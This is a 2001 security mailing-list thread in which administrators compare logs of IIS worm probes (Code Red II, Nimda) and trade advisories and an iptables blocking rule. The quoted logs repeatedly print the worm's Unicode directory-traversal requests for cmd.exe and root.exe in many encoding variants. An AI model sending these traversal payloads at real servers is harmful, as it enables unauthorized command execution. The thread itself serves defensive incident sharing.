Hi, I thought Code RED was slowing down :-( Other then getting the regular GET "default.ida" requests I have been logging things like this for the last two hours from different IP's. 1) Anyone else getting similar things or is me ? 2) Is it worth to bother sending these logs to the provider of the ip's ? TIA Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:39 gardiyan last message repeated 3 times ::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" -- Togan Muftuoglu
Hi Togan! On Tue, 18 Sep 2001, Togan Muftuoglu wrote:
Hi,
I thought Code RED was slowing down :-( Other then getting the regular GET "default.ida" requests I have been logging things like this for the last two hours from different IP's.
1) Anyone else getting similar things or is me ?
yeap, me too... I have this for the older ones: $IPTABLES -I INPUT -p tcp --dport 80 -m string --string .ida -m state --state ESTABLISHED -j REJECT --reject-with tcp-reset I guess we can just add another one for cmd.exe in place of `.ida'. -- teodor
* teo@gecadsoftware.com; <teo@gecadsoftware.com> on 18 Sep, 2001 wrote: Hi Teodor
yeap, me too...
Ooh I thought I was going crazy :-)
I have this for the older ones: $IPTABLES -I INPUT -p tcp --dport 80 -m string --string .ida -m state --state ESTABLISHED -j REJECT --reject-with tcp-reset
I guess we can just add another one for cmd.exe in place of `.ida'.
Well I am still on ipchains and using return-rst that Boris suggested to block IP's and I am usning that one Thanks for the info -- Togan Muftuoglu
Is anyone writing the occurence of WEB IIS cmd.exe requests up for bugtraq already? Cheers, Yuri.
Jo, On 18-Sep-01 Yuri Robbers wrote:
Is anyone writing the occurence of WEB IIS cmd.exe requests up for bugtraq already?
This beast is known since quite a while now, and Microsoft already produced some cleaning-tools and patches against it. It has been discussed on bugtraq already. A good overview of Code Red II can be found on incidents.org: http://incidents.org/react/code_redII.php This document states that the source for most Code Red/II attacks are PCs of home users who don�t know about the standard IIS installation on their Win2k boxes. Code Red II is particularly nasty because it copies the cmd.exe into a location where it is accessible from anywhere via the web. It also trojanizes the explorer.exe to "offer" C: and D: to the world (also via internet of course). If the worm finds Chinese as the standardly installed language, it runs for 48 hours and starts 600 (!) threads (24/300 for other languages) to attack and infect other victims. The worm is also heavily killing bandwith; imagine 600 instances of the worm trying to browse/scan their networking neighbourhood; the worm code tries to attack the same subnet where its host resides in, and the number of ARP requests are very high. This has lead to a breakdown of some small ISPs in the last couple of days.
Cheers, Yuri.
** Reply to message from Boris Lorenz <bolo@lupa.de> on Tue, 18 Sep 2001 18:23:09 +0200 (CEST) guys , is the same code red derivative that is being reprted on telly ? called nimda ? ( note this is admin , reversed <sigh> ) These things seem to be escalating. Do we know anything about the objective of this little gem? ( note sarcasm ship is ON ) Also note some haxor group apparently took down the Afgahn Palace's website today .. so I would suspect the entire Web commiunity will also come under increasing attacks ( there IS always a sort of tit for tat aspect in these web *wars*, or so it seems <sigh> afterthought: Very funny, Scotty. Now beam down my clothes.
Yup, On 18-Sep-01 jfweber@eternal.net wrote:
** Reply to message from Boris Lorenz <bolo@lupa.de> on Tue, 18 Sep 2001 18:23:09 +0200 (CEST)
guys , is the same code red derivative that is being reprted on telly ? called nimda ? ( note this is admin , reversed <sigh> ) These things seem to be escalating. Do we know anything about the objective of this little gem? ( note sarcasm ship is ON )
AFAIK, nimda is a Code Red-style worm which spreads via email. It usually hides inside an attachement called readme.exe and starts to browse the networking neighbourhood once it has been activated, for example by doubleclicking/previewing the attachement. It then scans for any vulnerable IIS servers and attacks them using the Unicode Web Traversal exploit. However, according to my records, nimda is not Code Red II but a deliberate transmutation of the Code Red design. There are some infos about nimda on http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html .
Also note some haxor group apparently took down the Afgahn Palace's website today .. so I would suspect the entire Web commiunity will also come under increasing attacks ( there IS always a sort of tit for tat aspect in these web *wars*, or so it seems <sigh>
Yep, I too think we're about to have a really wonderful time!
afterthought: Very funny, Scotty. Now beam down my clothes.
:) LOL Boris Lorenz <bolo@lupa.de> ---
i have the same logentrys since 15:14 pm ! it looks like a new worm, i have 14 different iis(exploid) scans per ip . but i cant find a new worm allert ! -:(
-----Original Message----- From: Togan Muftuoglu [mailto:toganm@users.sourceforge.net] Hi,
I thought Code RED was slowing down :-( Other then getting the regular GET "default.ida" requests I have been logging things like this for the last two hours from different IP's.
1) Anyone else getting similar things or is me ? 2) Is it worth to bother sending these logs to the provider of the ip's ?
TIA
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:39 gardiyan last message repeated 3 times
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c. ./winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
-- Togan Muftuoglu
-- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
1200 lines since 15:14 pm !!! global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:10 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:11 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:12 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:12 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - global.peapc.com - - [18/Sep/2001:16:50:13 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - From the Symantec website: http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html W32.Nimda.A@mm Discovered on: September 18, 2001 Last Updated on: September 18, 2001 at 08:15:23 AM PDT This is the preliminary information known at this time. There is a new mass-mailing worm that utilizes email to propagate itself. The threat arrives as readme.exe in an email. In addition, the worm sends out probes to IIS servers attempting to spread by using the Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised servers may display a webpage prompting a visitor to download an Outlook file which contains the worm as an attachment. Also, the worm will create an open network share allowing access to the system. The worm will also attempt to spread via open network shares. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.1 Int. for non-commercial use <http://www.pgpinternational.com> iQA/AwUBO6dyemCxI19Ln0TAEQKqeACcD+s7vfY5gPRyJx/jK0jeP6wdkmsAoPWG bUM6g8DfAJinS+iUuJFJXiO1 =Qn2w -----END PGP SIGNATURE-----
Same here ..., so : 1) it's not you 2) we have logged around 220 tries from 100 different IP's since 15:00 CEST today. I guess its a new worm that uses CRII-infected servers as base infrastructure. Eric Togan Muftuoglu wrote: Togan Muftuoglu wrote:
Hi,
I thought Code RED was slowing down :-( Other then getting the regular GET "default.ida" requests I have been logging things like this for the last two hours from different IP's.
1) Anyone else getting similar things or is me ? 2) Is it worth to bother sending these logs to the provider of the ip's ?
TIA
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:39 gardiyan last message repeated 3 times
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
-- Togan Muftuoglu
-- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
-- ----------------------------------------------- | Eric Mueller | E.Solutions Central Europe | Solutions Consulting | EDS Informationstechnologie und Service GmbH | Eisenstr. 56 | 65428 Ruesselsheim, Germany -----------------------------------------------
Hi,
I thought Code RED was slowing down :-( Other then getting the regular GET "default.ida" requests I have been logging things like this for the last two hours from different IP's.
1) Anyone else getting similar things or is me ?
me too. I put up a new server at a cohost facility, <1 minute after turning on httpd for the first time, guess which file was requested? Iget a few hundred to a few thousand a day still on various machines.
2) Is it worth to bother sending these logs to the provider of the ip's ?
yes and no. some yes, some no.
TIA
Kurt Seifried, kurt@seifried.org A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://www.seifried.org/security/
On Tue, Sep 18, 2001 at 05:22:24PM +0300, Togan Muftuoglu wrote: [...] If anyone is interested: IIS Worm-Registry, http://worm.jungnickel.com -- Mit freundlichen Gruessen / Yours sincerely Wolfram Schlich * E-Mail: wolfram@schlich.org * ICQ: UIN 35713642 Postal: Berghof, D-56626 Andernach-Kell * Phone: +49-(0)2636-941194
participants (10)
-
Boris Lorenz -
Eric Mueller -
jfweber@eternal.net -
Kurt Seifried -
Lars Schlimpert -
Matthew Thomas -
teo@gecadsoftware.com -
Togan Muftuoglu -
Wolfram Schlich -
Yuri Robbers